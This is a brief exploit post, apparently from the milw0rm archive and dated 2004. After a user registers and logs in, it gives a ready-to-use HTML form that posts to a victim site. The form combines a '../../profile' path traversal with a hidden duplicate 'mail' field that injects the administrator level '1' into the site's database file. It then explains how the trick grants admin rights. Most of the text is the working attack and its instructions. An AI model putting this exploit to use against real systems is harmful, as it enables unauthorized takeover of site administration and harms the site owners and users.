Demonstration:
Register a user account then login and run the exploit.html
---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---
That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )
# milw0rm.com [2004-09-30]